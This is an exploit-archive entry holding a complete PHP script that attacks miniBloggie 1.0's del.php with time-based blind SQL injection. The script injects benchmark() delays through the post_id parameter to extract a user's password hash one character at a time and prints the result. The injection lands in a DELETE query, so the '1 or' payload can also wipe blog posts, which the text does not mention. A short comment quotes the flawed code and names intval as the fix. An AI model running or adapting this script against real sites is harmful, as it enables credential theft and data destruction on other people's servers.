miniBloggie 1.0 - 'del.php' Blind SQL Injection

EDB-ID:

6782


Author:

StAkeR

Type:

webapps


Platform:

PHP

Date:

2008-10-18


#!/usr/bin/php 
<?php

error_reporting(0);


/*
   miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
   ------------------------------------------------------------
   Author -> StAkeR aka athos - StAkeR[at]hotmail[dot]it
   Date   -> 18/10/2008
   Get    -> http://www.mywebland.com/dl.php?id=2
   ------------------------------------------------------------
   
   File del.php
   
   25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
   26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
   27.
   28. if ($confirm=="") {   
   29. notice("Confirmation", "Warning : Do you want to delete this post ? <a href=del.php?post_id=".$post_id."&confirm=yes>Yes</a>");
   30. }
   31. elseif ($confirm=="yes") {
   32. // Data Base Connection  //
   33. dbConnect();
   34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   35. $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
   36. $confirm ="";
   37. notice("Del Post", "Data Deleted");
   38. }
   39. else notice( "Delete Error, Unable to complete the task !" );
   40. ?>

   NOTE:
   
   $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   
   $post_id isn't escaped so you can execute SQL Code 
   
   How to fix? sanize $post_id with intval or int (PHP Functions)
   
  
*/  



function get($host,$path,$evil)
{
  if(!preg_match('/\w:[0-9]/i',$host)) alert();
  $inet = explode(':',$host);

  if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');
  
  $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n";
  $data .= "Host: $host[0]\r\n";
  $data .= "User-Agent: Lynx (textmode)\r\n";
  $data .= "Connection: close\r\n\r\n";
  
  fputs($sock,$data);
  
  while(!feof($sock)) { $html .= fgets($sock); }
  fclose($sock);
  
  return $html;
}


function alert()
{
  echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
  echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n";
  echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n";
  die;
}


function charme($char,$colum,$id)
{
  $sql = "1 or (select if((ascii(substring(password".
         ",$colum,1))=$char),benchmark(200000000,char(0)),0)".
         " from blogusername where id=$id)#";
  
  return urlencode($sql);
}


$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$c = 0;


for($i=0;$i<=32;$i++)
{
  for($j=0;$j<=17;$j++)
  {
    $start = time();
    
    get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));
    
    $stop = time();
    
    if($stop - $start > 12)
    {
      $password .= chr($hash[$j]);
      $c++;;
      break;
    }
  }
}

if(isset($password))
{
  echo "# Hash: $password\r\n";
  die;
}
else
{
  echo "# Exploit Failed!\r\n";
}
    



?>

# milw0rm.com [2008-10-18]